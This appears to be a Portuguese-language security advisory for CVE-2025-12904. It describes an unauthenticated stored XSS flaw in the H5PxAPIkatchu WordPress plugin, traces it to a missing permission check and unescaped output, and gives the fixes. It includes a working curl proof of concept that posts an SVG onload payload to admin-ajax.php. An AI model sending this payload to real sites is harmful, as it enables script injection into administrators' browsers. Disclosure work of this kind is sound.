
Divulgação do CVE-2025-12904
Divulgação para CVE-2025-12904
Este repositório divulga uma vulnerabilidade encontrada no SNORDIAN's H5PxAPIkatchu <= 0.4.16, plugin WordPress desenvolvido por otacke.
| CVE ID | Tipo | Componente | Impacto |
|---|---|---|---|
| CVE-2025-12904 | Cross-Site Scripting Armazenado Não Autenticado via insert_data | class-table-view.php | Atacante autenticado pode executar JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※Se o id dentro do objeto não existir, a ação falhará.
A função insert_data() não realizava nenhuma verificação de permissão, permitindo que entradas maliciosas fossem salvas sem autenticação. Além disso, essas entradas eram exibidas sem escape na interface de administração.
insert_data() usa current_user_can para impedir execução não autorizada.esc_html($value) em vez de echo $value, você pode prevenir a execução de XSS.Foi muito difícil criar o PoC.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
Perdi muito tempo tentando reproduzir essa parte. Quero ficar melhor no uso do comando curl. E esse plugin... está tudo bem? Principalmente o nome, né.
Nome: MooseLove
Função: Pesquisador de segurança independente / caçador de bugs
Contato: Disponível mediante solicitação
Este aviso é fornecido para conscientização pública sobre segurança. Livre para compartilhar com atribuição.